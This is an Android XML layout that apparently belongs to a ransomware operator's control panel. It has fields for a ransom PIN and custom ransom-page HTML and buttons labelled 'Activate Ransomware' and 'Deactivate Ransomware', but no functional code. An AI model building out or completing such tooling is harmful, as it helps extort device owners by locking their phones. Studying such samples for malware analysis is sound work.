<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="match_parent" android:layout_height="match_parent"
    android:orientation="vertical" android:background="#000" android:padding="16dp">
    <EditText android:id="@+id/ransomPIN" android:hint="PIN" android:inputType="number"
        android:textColor="#fff" android:backgroundTint="#333" android:layout_margin="4dp"/>
    <EditText android:id="@+id/ransomHTML" android:hint="HTML" android:gravity="top"
        android:minLines="3" android:textColor="#fff" android:backgroundTint="#333"
        android:layout_margin="4dp"/>
    <Button android:text="Activate Ransomware" android:layout_margin="4dp"/>
    <Button android:text="Deactivate Ransomware" android:layout_margin="4dp"/>
</LinearLayout>
